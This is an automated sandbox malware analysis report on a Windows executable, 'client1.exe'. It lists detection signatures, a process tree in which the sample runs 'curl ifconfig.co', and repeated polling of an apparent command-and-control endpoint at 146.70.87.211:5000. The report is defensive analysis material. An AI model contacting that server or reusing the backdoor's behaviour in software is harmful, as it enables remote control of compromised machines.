Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
client1.exe

Overview

General Information

Sample name:client1.exe
Analysis ID:1548293
MD5:950c13286d42ad2da05b1778c1e2d747
SHA1:3096643a168bcc2841592c676237aa6f1132ce4c
SHA256:31c85a75181aaacb26b304987e11920b59fadea48f15dc6996c4e5d48a1b41e0
Tags:exeuser-lontze7
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Machine Learning detection for sample
Potentially malicious time measurement code found
Uses known network protocols on non-standard ports
Binary contains a suspicious time stamp
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • client1.exe (PID: 4052 cmdline: "C:\Users\user\Desktop\client1.exe" MD5: 950C13286D42AD2DA05B1778C1E2D747)
    • client1.exe (PID: 6776 cmdline: "C:\Users\user\Desktop\client1.exe" MD5: 950C13286D42AD2DA05B1778C1E2D747)
      • cmd.exe (PID: 964 cmdline: C:\Windows\system32\cmd.exe /c "curl ifconfig.co" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 4032 cmdline: curl ifconfig.co MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 4040 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c "curl ifconfig.co", CommandLine: C:\Windows\system32\cmd.exe /c "curl ifconfig.co", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\client1.exe", ParentImage: C:\Users\user\Desktop\client1.exe, ParentProcessId: 6776, ParentProcessName: client1.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "curl ifconfig.co", ProcessId: 964, ProcessName: cmd.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-04T09:49:36.882714+010020229301A Network Trojan was detected52.149.20.212443192.168.2.849712TCP
2024-11-04T09:50:15.115068+010020229301A Network Trojan was detected52.149.20.212443192.168.2.849723TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: client1.exeJoe Sandbox ML: detected
Source: client1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: client1.exe, 00000000.00000003.1455973509.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696755408.00007FFBBB5D3000.00000002.00000001.01000000.0000000C.sdmp, select.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: client1.exe, 00000000.00000003.1456400371.00000262AABD6000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: client1.exe, 00000002.00000002.2697114928.00007FFBBB640000.00000002.00000001.01000000.00000007.sdmp, _ctypes.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: client1.exe, 00000000.00000003.1448754711.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2695572139.00007FFBAB4C7000.00000002.00000001.01000000.00000011.sdmp, _hashlib.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: client1.exe, 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp, _decimal.pyd.0.dr
Source: Binary string: D:\a\bcrypt\bcrypt\bcrypt-4.0.1\src\_bcrypt\target\x86_64-pc-windows-msvc\release\deps\bcrypt_rust.pdb source: _bcrypt.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: client1.exe, 00000000.00000003.1448897048.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696852289.00007FFBBB5FC000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: client1.exe, 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp, _decimal.pyd.0.dr
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: client1.exe, 00000002.00000002.2695863482.00007FFBAB626000.00000002.00000001.01000000.0000000E.sdmp, libssl-1_1.dll.0.dr
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: client1.exe, 00000002.00000002.2695863482.00007FFBAB626000.00000002.00000001.01000000.0000000E.sdmp, libssl-1_1.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: client1.exe, 00000000.00000003.1449006308.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696663196.00007FFBBB553000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: client1.exe, 00000002.00000002.2695138214.00007FFBAB0CF000.00000002.00000001.01000000.0000000F.sdmp, libcrypto-1_1.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: client1.exe, 00000000.00000003.1448897048.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696852289.00007FFBBB5FC000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: client1.exe, 00000000.00000003.1448200962.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696978385.00007FFBBB61D000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: client1.exe, 00000000.00000003.1447108890.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2697246600.00007FFBBCD51000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: client1.exe, 00000000.00000003.1447108890.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2697246600.00007FFBBCD51000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: client1.exe, 00000000.00000003.1449073775.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696163480.00007FFBB1898000.00000002.00000001.01000000.0000000B.sdmp, _socket.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: client1.exe, 00000000.00000003.1453554030.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2691113570.000001692E700000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1s 1 Nov 2022built on: Mon Jan 9 20:35:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: client1.exe, 00000002.00000002.2695138214.00007FFBAB0CF000.00000002.00000001.01000000.0000000F.sdmp, libcrypto-1_1.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: client1.exe, 00000002.00000002.2693682237.00007FFBAABCC000.00000002.00000001.01000000.00000004.sdmp, python311.dll.0.dr
Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: client1.exe, 00000002.00000002.2695138214.00007FFBAB151000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: client1.exe, 00000002.00000002.2696036271.00007FFBAB66D000.00000002.00000001.01000000.0000000D.sdmp, _ssl.pyd.0.dr
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F636714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF79F636714
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F627820 FindFirstFileExW,FindClose,0_2_00007FF79F627820
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F636714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF79F636714
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F6409B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF79F6409B4
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FF79F636714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,2_2_00007FF79F636714
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FF79F627820 FindFirstFileExW,FindClose,2_2_00007FF79F627820
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FF79F636714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,2_2_00007FF79F636714
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FF79F6409B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF79F6409B4
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C2158 FindFirstFileW,2_2_00007FFBAB1C2158
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE83229 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte,2_2_00007FFBAAE83229

Networking

barindex
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 5000
Source: global trafficTCP traffic: 192.168.2.8:49706 -> 146.70.87.211:5000
Source: unknownDNS query: name: ifconfig.co
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.8:49712
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.8:49723
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.87.211
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ifconfig.coUser-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficHTTP traffic detected: GET /clients/996/commands HTTP/1.1Host: 146.70.87.211:5000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
Source: global trafficDNS traffic detected: DNS query: ifconfig.co
Source: client1.exe, 00000002.00000002.2692343833.000001692EFE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
Source: client1.exe, 00000002.00000002.2695689625.00007FFBAB535000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://.css
Source: client1.exe, 00000002.00000002.2695689625.00007FFBAB535000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://.jpg
Source: client1.exe, 00000002.00000002.2690716906.000001692E400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://146.70.87.211:5000
Source: client1.exe, 00000002.00000002.2692478911.000001692F1D8000.00000004.00001000.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2692478911.000001692F178000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://146.70.87.211:5000/clients/996/commands
Source: client1.exe, 00000002.00000002.2692478911.000001692F1D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://146.70.87.211:5000/clients/996/commands0
Source: client1.exe, 00000002.00000002.2692478911.000001692F1D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://146.70.87.211:5000/clients/996/commandsP
Source: client1.exe, 00000002.00000002.2692478911.000001692F1D8000.00000004.00001000.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2692478911.000001692F178000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://146.70.87.211:5000/clients/996/commandsp
Source: client1.exe, 00000002.00000002.2690716906.000001692E400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://146.70.87.211:5000bject
Source: client1.exe, 00000002.00000002.2690809690.000001692E508000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1475247941.000001692E564000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1474501548.000001692E55D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.87.211:5000r
Source: client1.exe, 00000000.00000003.1448897048.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
Source: client1.exe, 00000000.00000003.1448897048.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.coj
Source: client1.exe, 00000000.00000003.1448897048.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1452429682.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1453212744.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1448754711.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1449176412.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1448460925.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1453554030.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1455973509.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1449073775.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1449006308.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1453344762.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1448605663.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1448200962.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1456400371.00000262AABD6000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1454128248.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: client1.exe, 00000000.00000003.1448897048.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1453212744.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1448754711.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1449176412.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1448460925.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1453554030.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1455973509.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1449073775.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1452429682.00000262AABE0000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1449006308.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1453344762.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1448605663.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1448200962.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1456400371.00000262AABD6000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1454128248.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: client1.exe, 00000000.00000003.1448897048.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1452429682.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1453212744.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1448754711.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1449176412.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1448460925.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1453554030.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1455973509.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1449073775.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1449006308.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1453344762.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000000.00000003.1448605663.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, 